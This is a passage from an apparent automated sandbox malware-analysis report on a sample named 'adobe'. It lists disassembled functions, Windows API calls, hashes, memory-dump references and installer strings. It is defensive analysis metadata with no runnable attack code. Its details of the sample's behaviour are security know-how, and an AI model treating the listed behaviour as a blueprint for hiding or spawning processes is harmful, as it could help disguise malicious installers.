                                                                                                                                                          • Instruction Fuzzy Hash: 4FF0F0713917203AF620B17A6C82F7B018CCB85F68F10823ABB04FF1C1D9A84C06066D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00481EB4 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • IsIconic.USER32(?), ref: 00481EF2
                                                                                                                                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 00481F10
                                                                                                                                                          • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049B050,004815EE,00481622,00000000,00481642,?,?,00000001,0049B050), ref: 00481F32
                                                                                                                                                          • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049B050,004815EE,00481622,00000000,00481642,?,?,00000001,0049B050), ref: 00481F46
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$Show$IconicLong
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2754861897-0
                                                                                                                                                          • Opcode ID: d1685bcdcd38db79443942f5787a6c940ff35178bdeaf12f7d811a120f7588a3
                                                                                                                                                          • Instruction ID: a151493f8bb258e154686fc306989cafdf15b2fa5ae2d2c6c79316c3cae0d13f
                                                                                                                                                          • Opcode Fuzzy Hash: d1685bcdcd38db79443942f5787a6c940ff35178bdeaf12f7d811a120f7588a3
                                                                                                                                                          • Instruction Fuzzy Hash: C20171702442059AD710F72A9D45B6F239CAB12308F0808BBBE519B6B3DB6D9C56974C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00461F78 Relevance: 4.6, APIs: 3, Instructions: 67fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,0046204C), ref: 00461FD0
                                                                                                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0046202C,?,00000000,?,00000000,0046204C), ref: 0046200C
                                                                                                                                                          • FindClose.KERNEL32(000000FF,00462033,0046202C,?,00000000,?,00000000,0046204C), ref: 00462026
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3541575487-0
                                                                                                                                                          • Opcode ID: ca4ce0d84dbd4ca56c3731b72821d8e08087772405383aaed1bec0098e4b73c7
                                                                                                                                                          • Instruction ID: 501593defdbab8929c71f5630084487ab8f477331e3ec7d708c0d9d753d3c012
                                                                                                                                                          • Opcode Fuzzy Hash: ca4ce0d84dbd4ca56c3731b72821d8e08087772405383aaed1bec0098e4b73c7
                                                                                                                                                          • Instruction Fuzzy Hash: C121A831904B08BEDB11EF65CC41ADEBBBCDB49704F5084B7B908E21A1E67C9E45CA5A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004241EC Relevance: 4.5, APIs: 3, Instructions: 32windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • IsIconic.USER32(?), ref: 004241F4
                                                                                                                                                          • SetActiveWindow.USER32(?,?,?,0046BECB), ref: 00424201
                                                                                                                                                            • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                                                                                            • Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,023325AC,0042421A,?,?,?,0046BECB), ref: 00423B5F
                                                                                                                                                          • SetFocus.USER32(00000000,?,?,?,0046BECB), ref: 0042422E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$ActiveFocusIconicShow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 649377781-0
                                                                                                                                                          • Opcode ID: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
                                                                                                                                                          • Instruction ID: b114ffa8fbe078055c417a305beb0b6e8983b6333d82b3c601511fe05fbe2975
                                                                                                                                                          • Opcode Fuzzy Hash: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
                                                                                                                                                          • Instruction Fuzzy Hash: 07F03A717001208BCB10EFAA98C4B9662A8EF48344B5500BBBC09DF34BCA7CDC0187A8
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00417CDE Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • IsIconic.USER32(?), ref: 00417D1F
                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                                                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                                                                                          • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$Placement$Iconic
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 568898626-0
                                                                                                                                                          • Opcode ID: 27cd6f1a1aab1ceb2c02a4b71596b5ee0c1af9df45b06411c7b3ae1ae91b0d5e
                                                                                                                                                          • Instruction ID: b3485382f52430a3de90e88073d2477855dbbaeb9eeee9907b508ce44eeb6dab
                                                                                                                                                          • Opcode Fuzzy Hash: 27cd6f1a1aab1ceb2c02a4b71596b5ee0c1af9df45b06411c7b3ae1ae91b0d5e
                                                                                                                                                          • Instruction Fuzzy Hash: 02017C31204108ABDB10EE69E8C1EEA73A8AF45324F054567FD08CF242D639ECC087A8
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004175A8 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CaptureIconic
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2277910766-0
                                                                                                                                                          • Opcode ID: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
                                                                                                                                                          • Instruction ID: 1c917faadd476c588bdf1ff4a00e1594475ac94e71cf422183988d33397b9b13
                                                                                                                                                          • Opcode Fuzzy Hash: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
                                                                                                                                                          • Instruction Fuzzy Hash: 85F04F32304A028BDB21A72EC885AEB62F59F84368B14443FE415CB765EB7CDCD58758
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004241A4 Relevance: 3.0, APIs: 2, Instructions: 22windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • IsIconic.USER32(?), ref: 004241AB
                                                                                                                                                            • Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                                                                                            • Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                                                                                            • Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                                                                                            • Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                                                                                          • SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF
                                                                                                                                                            • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2671590913-0
                                                                                                                                                          • Opcode ID: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
                                                                                                                                                          • Instruction ID: ffd443eaca36288e12b0fd3e34cf0737071334a0f5e631569de285e60205db71
                                                                                                                                                          • Opcode Fuzzy Hash: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
                                                                                                                                                          • Instruction Fuzzy Hash: 02E0E5A470010187EF00EFAAD8C9B9662A9AB48304F55057ABC08CF24BDA78C954C724
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004125E8 Relevance: 1.7, APIs: 1, Instructions: 188nativeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127E5), ref: 004127D3
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: NtdllProc_Window
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4255912815-0
                                                                                                                                                          • Opcode ID: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
                                                                                                                                                          • Instruction ID: b8ba5a3252dd9dd8755954997f8cc70cf1688dd1015ecfd52c1097a8d2c67521
                                                                                                                                                          • Opcode Fuzzy Hash: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
                                                                                                                                                          • Instruction Fuzzy Hash: 995106316082058FC710DB6AD681A9BF3E5FF98304B2482BBD854C7392D7B8EDA1C759
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004776DC Relevance: 1.6, APIs: 1, Instructions: 107nativeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0047782A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: NtdllProc_Window
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4255912815-0
                                                                                                                                                          • Opcode ID: 02ae22fd70e0c6a07adb20481ecb91dbe924fee2b1f277cc8f63ad28d9980f35
                                                                                                                                                          • Instruction ID: 2dd525ea0bd0e215e4ec5d52a323d7dc26d8735cacf0c835bff5f74eef0b1e04
                                                                                                                                                          • Opcode Fuzzy Hash: 02ae22fd70e0c6a07adb20481ecb91dbe924fee2b1f277cc8f63ad28d9980f35
                                                                                                                                                          • Instruction Fuzzy Hash: C0412639608104DFCB14CFA9C2848AABBF5FB48310BB5C996E848DB305D338EE41DB95
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0045CA5C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ArcFourCrypt._ISCRYPT(?,?,?,0046D01C,?,?,0046D01C,00000000), ref: 0045CA67
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CryptFour
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2153018856-0
                                                                                                                                                          • Opcode ID: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
                                                                                                                                                          • Instruction ID: 196b54fe7aa8ab1053afe2cffafcf6ed6da51dc24599f2bb869cb02721a3a021
                                                                                                                                                          • Opcode Fuzzy Hash: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
                                                                                                                                                          • Instruction Fuzzy Hash: 7EC09BF240420CBF65005795FCC9C77F75CE65C6647408126F60442101D671AC1045B4
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0045CA74 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046CC8C,?,0046CE6D), ref: 0045CA7A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CryptFour
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2153018856-0
                                                                                                                                                          • Opcode ID: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
                                                                                                                                                          • Instruction ID: f930510039fdc8c4d2d2d599ed284be9893e60875d5d975e013ee6f81a6adef0
                                                                                                                                                          • Opcode Fuzzy Hash: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
                                                                                                                                                          • Instruction Fuzzy Hash: E8A002B0E80300BAFD3057706E0EF37252CD7D4F01F208465B211A91D4C6A46404857C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 10001130 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2905260352.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2905228420.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2905290111.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_10000000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                                                                          • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                                                                                          • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                                                                          • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 10001000 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2905260352.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2905228420.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2905290111.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_10000000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                                                                          • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                                                                                          • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00457640 Relevance: 45.7, APIs: 11, Strings: 15, Instructions: 237filesynchronizationprocessCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateMutexA.KERNEL32(00498AF8,00000001,00000000,00000000,00457975,?,?,?,00000001,?,00457B8F,00000000,00457BA5,?,00000000,0049A628), ref: 0045768D
                                                                                                                                                          • CreateFileMappingA.KERNEL32(000000FF,00498AF8,00000004,00000000,00002018,00000000), ref: 004576C5
                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045794B,?,00498AF8,00000001,00000000,00000000,00457975,?,?,?), ref: 004576EC
                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004577F9
                                                                                                                                                          • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045794B,?,00498AF8,00000001,00000000,00000000,00457975), ref: 00457751
                                                                                                                                                            • Part of subcall function 00452B0C: GetLastError.KERNEL32(00000000,0045357D,00000005,00000000,004535B2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496A6D,00000000), ref: 00452B0F
                                                                                                                                                          • CloseHandle.KERNEL32(00457B8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457810
                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00457B8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457849
                                                                                                                                                          • GetLastError.KERNEL32(00000000,000000FF,00457B8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045785B
                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000,00457952,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045792D
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00457952,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045793C
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00457952,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457945
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                                                                                                                          • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
                                                                                                                                                          • API String ID: 4012871263-351310198
                                                                                                                                                          • Opcode ID: c1ffd9fe300eab0a4412b94547705dcdf208e35da1cfc2d7785f4b32c2b71e43
                                                                                                                                                          • Instruction ID: 83924714922b720040bdc1829d4bd497e207e2bebaa4b90c240c2e7d337cbd3a
                                                                                                                                                          • Opcode Fuzzy Hash: c1ffd9fe300eab0a4412b94547705dcdf208e35da1cfc2d7785f4b32c2b71e43
                                                                                                                                                          • Instruction Fuzzy Hash: FA915270E042159BDB10EFA9D845B9EB7B4EB44305F10857BE814EB383DB789948CB69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0041F128 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 87libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                                                                                          • SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                                                                                          • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
